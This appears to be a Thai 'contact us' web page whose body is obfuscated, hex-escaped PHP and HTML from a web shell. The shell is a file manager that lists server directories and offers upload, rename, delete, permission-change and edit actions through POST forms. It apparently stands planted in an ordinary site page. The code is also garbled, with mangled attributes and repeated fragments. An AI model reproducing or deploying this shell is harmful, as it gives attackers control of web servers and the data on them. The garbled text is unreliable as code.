ติดต่อเรา

${${"x47Lx4fx42Ax4cx53"}["sx64x72x62x6cx76x62"]}){${"Gx4cx4fx42Ax4c x53"}["x65x7ax75x78jx61x71x6dcl"]="kx65x79";${"Gx4cx4fx42Ax4cx53"}["x73 x67x72x67x6dux68x71x7ax74x6c"]="x76x61x6cx75x65";$_POST[${${"x47x4cx4fx42 x41x4cx53"}["ezx75x78x6ax61x71x6dcx6c"]}]=stripslashes(${${"Gx4cOx42x41x4cx53"} ["x73x67rx67mux68qx7ax74x6c"]});}}$sidmjfwyo="px61th";echo" x3ccx65x6ex74x65x72 x3e x3csx74x79lx65 tx79x70x65=x22tx65x78x74/csx73"x3e box64yx20{ font-x66 x61mily:x20x22Gex6dux6eux20Lx69bx72x65x22; x62ackgx72x6fx75x6ed-imax67x65:x20url(x22x68 x74x74ps://x364.x6dx65x64x69ax2etux6dblrx2ecx6fx6d/x6681x36x639x34x330x614x385x31bx62196ex35x35x39x61dx653x61 x399ax64/x74x75x6dbx6cx72x5fx70x61x71hc1x38x6ax6dD1x78x701j77ox31_6x34x30.gix66x22)x3b tcx6flx6fx72: x6cx69x6dx65; } x23x63x6fntx65nt x74x72:x68ox76x65r{ bax63 x6bx67rox75x6ed-colox72:x20x62x6cacx6b; tx65xt-x73hax64ox77:x30px78 x30px78x20x31x30 x70x78 #x30x30x30x30x300; } x23cox6ex74x65ntx20x2ex66ix72x73x74{ cx6f x6cor: #x300x300x300; x62ax63kx67rx6fund-x69x6dax67x65:urx6c(x23)x3b } x23x63ox6etx65x6ex74x20x2efx69x72st:hox76ex72{ bx61x63kgx72ox75nd-cx6flx6fx72: x62l x61ck; texx74-shx61x64x6fw:0px78 x30pxx201pxx20#x33x33x39x390x30x3b } x74able, x20tx68,x20tx64 { border-cx6fx6clapse:x63ox6cx6capsx65x3b x70ax64ding: x34px78x3b tcx6fx6cx6fr:x20x6cx69x6dex3b } x2etablx65x5fhox6de, .tx68x5fhome,x20x2ex74d x5fx68omx65 {x20 cox6cor: x6cx69x6de; x62x6frder:x20x31px78 x73olidx20x72x65 x64x3b x70adding:x207pxx3b } a{ fx6fnx74-size: 1x38x70x78; colo x72: #FFx30x300x30; tex78x74-dex63x6fx72atx69ox6e: x6ex6fx6ex65; } x61 :hox76ex72{ colx6fr:x20white; x74x65x78t-x73x68x61x64ox77:x30px 0x70x 1x30x70x x20#3399x30x30; } x69x6eput,sx65x6cx65cx74,textarx65x61{ border:x20x31px78x20# x66x66x66x66ffx20x73olid; -x6dx6fx7a-bordex72-x72x61x64ius: x35x70x; -x77x65b x6bit-x62ox72x64er-x72ax64x69x75x73:5pxx3b x62x6fx72dex72-radix75x73:5px78x3b } .x63x6cx6fse { x6fvex72fl x6fw:x20aux74o; x62ox72x64er:x20x31px78x20x73olid x6cx69me; backgrx6funx64:x20x6cx69me; colox72: x77hix74ex3b } x2erx20{ fx6cox61t: x72ix67ht; texx74-x61ligx6e :x20x72ighx74; } x3c/sx74x79x6cex3e x3cfx6fnt x63x6flx6fx72x3d'whx69x74x65'x3e x3cix20clx61x73x73='fx61x20fx61-x68dx64-x6fx27x3ex3c/tdx3ex3c/x74x61bx6ce>";echo" Pex72mix73x73x69ox6ex20:x20x3cinpx75x74x20x6ex61mx65=x22permx22" x65=""x47x6fx22" x65d="" x66orm--="" x67al="" x68t:="" x69on=""?x6fptx69ox6ex26pathx3d".${${"x47x4cx4fx42ALx53"}["x6ax71x61x6cx75x62vsx6dt"]}."x26opx74=dex6cx65x74ex26tyx70e=x62uax74x22" x6c="" x6ce="" x6cor="x22rx65d"x3ex43x48x41NGEx20NAME" x6d="" x6de=""namx65x22" x6ege="" x6et="" x6fd="x22x50x4fST"x3e x55px6cx6fad" x6frm="" x70e=""hx69ddenx22" x70load="" x72="" x72:="" x73="" x74="" x74:="" x74r="" x74ype="x22tex78tx22x20x73ix7ae="x325"" x75e="x22".${${"x47Lx4fBx41x4cS"}["jx71x61x6cx75x62vx73mx74"]}.""> x3cix6ex70ut" x75t="" x78="" x79pe="x22tx65x78tx22x20x73ix7aex3dx22x34x22">x3cx62x72/x3e";}else{echo"ax6cex72t(x22Cx68anx67ex20x4ex61mx65x20x47x61gal x21!x22)x3c/sx63x72x69px74>";}$_POST["x6eax6dx65"]=$_POST["nex77x6ex61x6de"];}echo"x3cx66ox72x6dx20x6dx65x74x68od="x50x4fx53x54"x3e Nex77x20x4ex61me :x20x3cx69x6ex70x75x74 x6ex61mx65="x6eex77nx61x6de"x20tx79px65x3d"tx65x78x74x22 x73x69x7ax65x3d"5" sx74yx6cx65=x22widx74h:x320x25x3bx20x68ex69x67x68x74:3x30pxx3b" x76aluex3d"".$_POST["x6ex61mx65"]."x22x20/> x3cx69npux74x20x74x79x70x65=x22hiddx65x6ex22x20x6eamex3dx22x70x61x74x68" vx61x6cx75ex3dx22".$_POST["x70ath"].""x3e x3cx69x6eputx20x74yx70e="x68x69x64dex6e"x20x6ex61me="x6fptx22x20x76x61x6cuex3d"renx61mex22x3e x3cx69nputx20x74ypx65="sx75bx6dx69t"x20vx61lue=x22x4canx6aux74" stx79lx65x3d"x68eighx74:30px;x22x20/> x45x44x49Tx20Fx49x4cx45 x53x55CCx45SS !x21 x3cthx3ex3ccex6ex74er>Sx69zx65x3ccx65nterx3ePx65rx6dx3c/x74h> x3cth>x3cx63entex72x3eOpx74x69ox6esx3c/x63ex6ex74ex72>x3c/x74x68> x3c/tr> ";$cbswzick="x73x63x61x6ex64x69r";foreach(${${"x47x4cx4fBAx4cS"}["yyx75x69ux6bx6fx68x75x69x6c"]} as${$xweptbn}){$eqlbjvstofps="dx69x72";if(!is_dir("$path/$dir")||${$eqlbjvstofps}=="."||${${"x47x4cOx42x41x4cx53"}["x70x6fpx63bx74x7ax61x65x69x6a"]}=="x2ex2e")continue;echo" x3ctdx20x63lx61x73x73x3dx74dx5fhx6fme>x3cix6dg sx72x63x3dx27dx61tx61:imx61x67e/x70x6eg;bax73x6564,x52x30lGx4fx44lhx45x77x41x51x41x4cMx41AAAAx41x50///5yx63x41Mx37x4fY///nP//x7av/Ox6ex50x663x39////x77x41Ax41x41x41x41AAx41Ax41AAx41x41x41x41Ax41AAAAAx41x41x41CHx35Bx41Ex41Ax41x67Ax4cx41Ax41x41x41x41Tx41x42x41AAx41Rx52EMx6cx4aqx3704x36yp6x42x78x73ix48Ex56Bx45Ax4bYx43x55x50x72Dp7x48x6cx58x52x64Ex6fMx71Cx65x62x70/x34Yx63hx66fx7aGx51x68x484Yx52x59PBx32DOx6cx48x50x69Kx77qdx31x50qx38x79rVVx67x33Qx59eH5RYx4b5rx4afax46x55Ux413vBx34fx42x49BAx44s=x27x3ex3cx61 hx72x65x66x3dx22?x70x61thx3d$path/$dirx22x3ex20$dirDx49Rx3c/cx65nx74x65x72x3ex3c/tx64> x3ctdx20clx61ssx3dx74dx5fhome>";if(is_writable("$path/$dir"))echo"";elseif(!is_readable("$path/$dir"))echo" Pex72mix73x73x69ox6ex20:x20x3cinpx75x74x20x6ex61mx65=x22permx22" x65=""x47x6fx22" x65d="" x66orm--="" x67al="" x68t:="" x69on=""?x6fptx69ox6ex26pathx3d".${${"x47x4cx4fx42ALx53"}["x6ax71x61x6cx75x62vsx6dt"]}."x26opx74=dex6cx65x74ex26tyx70e=x62uax74x22" x6c="" x6ce="" x6cor="x22rx65d"x3ex43x48x41NGEx20NAME" x6d="" x6de=""namx65x22" x6ege="" x6et="" x6fd="x22x50x4fST"x3e x55px6cx6fad" x6frm="" x70e=""hx69ddenx22" x70load="" x72="" x72:="" x73="" x74="" x74:="" x74r="" x74ype="x22tex78tx22x20x73ix7ae="x325"" x75e="x22".${${"x47Lx4fBx41x4cS"}["jx71x61x6cx75x62vx73mx74"]}.""> x3cix6ex70ut" x75t="" x78="" x79pe="x22tx65x78tx22x20x73ix7aex3dx22x34x22">=1024){$xfrfvtyyt="x73x69x7ax65";${"x47x4cx4fBAx4cx53"}["x72x78eax67x68bcx70x68cy"]="x73ix7ax65";${$xfrfvtyyt}=round(${${"x47x4cx4fx42Ax4cx53"}["x72xx65x61x67hx62cx70x68cx79"]}/1024,2)."x20Mx42";}else{${"x47x4cx4fx42x41x4cx53"}["jx74x75x65x72x7acx6apno"]="sizx65";$ehsiglty="x73ix7ax65";${${"GLx4fx42x41x4cS"}["x6ax74x75x65x72x7ax63x6ax70x6ex6f"]}=${$ehsiglty}." Kx42";}echo"x3ctx72> x3ctdx20clx61x73x73=td_hx6fme>x3cx69x6dgx20sx72x63x3dx27dax74x61:x69magx65/png;x62ax73e6x34,ix56x42x4fRw0x4bGx67x6fAAx41x41Nx53Uhx45x55gx41Ax41x42x41x41AAAx51x43x41x59AAx41Af8/x39hx41x41AAx41Xx4eSx52x30x49x41x72x734cx36x51AAAx41Zx69x53x30dEAx50x38A/x77x44/x6fLx32nx6bx77x41Ax41x41lx77SFx6czx41x41Ax4cx45wx41x41x43x78MBx41Jqcx47AAx41x41x41dx30Sx55x31x46x429x6fx4ax42hcx54Jv2Bx32x64x34x41x41x41Jx4dSURx42VDx6aLbZO9Tx68x78Zx45x49x57/x71lvdtx4dx33x38Bx4egx4ax51x6dQx67Jx47d+A/MQBx4cx77x47jx69x77x483x6ewdx6bx53LtOx32x78ERG5Lx71xx58RSIx52x32Yx44x66x444x47x6bGx4dx30x50x33x72x62x34b9x50x41x7a0x6c7pSx6cx57x6cx570fx6enLox6cAIPBx34x50Xhx34eFunx75cx41x49x49x4cwx64Ex53ex5ax79Ax69x66nx706+u9ox4ex4cx6f3x67x4dx33x4ezx54x64x48R+//zx76Jx4dzx53x79x4aKx4box64x69x49g8x41Xx61x78x65x49x7ax31x62Dx5ax37Mx78x71x4efx74x67Sx55x52DWx797x4cx55nZ0dx59mx78x41x46AVx45x6cx496Ax45Cx79gIx73x51Qx73x69x7ax4cBOx41BADx4fx6ax4bAx70qx687x75x37Gx6fx43UWix77YbetoUHrrPx63x77x43x71x6fx462Kx55x65x58x4cx7ax45x7ax42x760+x75Qmx53x48Mx45Z9x466Sx5acx72x36x694IsBx4fx61/bx37Hx51MaHtx49x41x77x67x4cdHx61lDx41x31x65vx30x65x51x62Sx6arx45x72x51wJx70x71Fx34x65Ax78/hx6fqx441x33x32x6dx4dx6bJx72x69x35ux53x4fx6cx46x68x45hpx55QIix6fjwamODx4esljfUx57x43x71x70LnOx61aCx53x4bJx74nax42Cx73x5ax59x6ax41x6clx6dXI4vx61x65ox61Vx580x63x62Sdhx6dURx33x7aAx4bvx4ex6ax59x36x56ix6fo0tWx7ax67x45ox6eKbx57+Kx6bGx57x743x55nt0x43eGx66Js9x67+UUx30rx45GHx48/Hx77/x4djx48x36/x54+x50x4fx64Fx6fRNKCx68Mx32x32x78x6dOPx65x73px6aPx47Qx36x48pNQ27x746sx41x43x44x53Nx61nx79x6fljx44x4cx45x64Vx61x46Ox4ce8Zx6bx55jx4b5x75x6bq3tx37x39x6cx50C7/Ox44k5x47a+Yx36x4fx35x4dx71x79mx4ex77x33x56x31y3x68yx7afXx30x68x71x76JLyx62x58Fx64++f2x64x33x64x30x64mx73+qx76x674ODz8fx48x780/x4cx73x62x653x3964sSx37+4x75Ex6ax75x6ex70qx6dx53x65x36e3x44x33Nx35/x4e0x57x5abx74lx79x39fx30x39nx5ax32x5a/x62x32x39vx32fx4cEex76x76Kx39qx767c2x74ox4bi8x55x69ix51x69qHx62mx36rix57x36x61x31x33fx6e+zx76x373+x6fx71x6fx72x68cx4cx67x4bUFXx56x50+fnx352+Lox6ej8x49LJ0x508Zx49x43x43F9/x50x54pCx6cx68pBx76x67Pex6cox4c9Ux355NIAAx41x41x41x41x53Ux56ORx4bx35Cx59x49Ix3d'>x3ca x68x72ex66=x22?x66x69lx65x73x72c=$path/$filex26x70ath=$path"x3ex20$filex3c/x61>x3cx63ex6etx65r>".${${"GLx4fx42x41x4cS"}["bx73bx76x72cmw"]}."";if(is_writable("$path/$file"))echo"x3cx66ox6et color=x22x235x37x46x460x30"x3e";elseif(!is_readable("$path/$file"))echo"x3cfx6fx6et x63ox6cor="x23FF0x30x30x34">";echo perms("$path/$file");if(is_writable("$path/$file")||!is_readable("$path/$file"))echo"x3c/x66x6fnx74>";echo"

Pex72mix73x73x69ox6ex20:x20x3cinpx75x74x20x6ex61mx65=x22permx22" x65=""x47x6fx22" x65d="" x66orm--="" x67al="" x68t:="" x69on=""?x6fptx69ox6ex26pathx3d".${${"x47x4cx4fx42ALx53"}["x6ax71x61x6cx75x62vsx6dt"]}."x26opx74=dex6cx65x74ex26tyx70e=x62uax74x22" x6c="" x6ce="" x6cor="x22rx65d"x3ex43x48x41NGEx20NAME" x6d="" x6de=""namx65x22" x6ege="" x6et="" x6fd="x22x50x4fST"x3e x55px6cx6fad" x6frm="" x70e=""hx69ddenx22" x70load="" x72="" x72:="" x73="" x74="" x74:="" x74r="" x74ype="x22tex78tx22x20x73ix7ae="x325"" x75e="x22".${${"x47Lx4fBx41x4cS"}["jx71x61x6cx75x62vx73mx74"]}.""> x3cix6ex70ut" x75t="" x78="" x79pe="x22tx65x78tx22x20x73ix7aex3dx22x34x22">

x41x63tiox6e x3coptix6fnx20x76x61lx75ex3dx22x64ex6cx65te"x3ex44x65letx65Edit x3c/sx65x6cx65x63t> x3cx69nx70utx20x74ypx65x3d"hiddex6ex22x20x6ex61x6dx65x3d x22x74yx70e" vx61lux65=x22x66ix6cex22> x3cix6ex70x75t x74x79px65=x22hx69x64dx65nx22 x20x6ex61mx65x3dx22x6ex61me" vax6cue="$file"x3e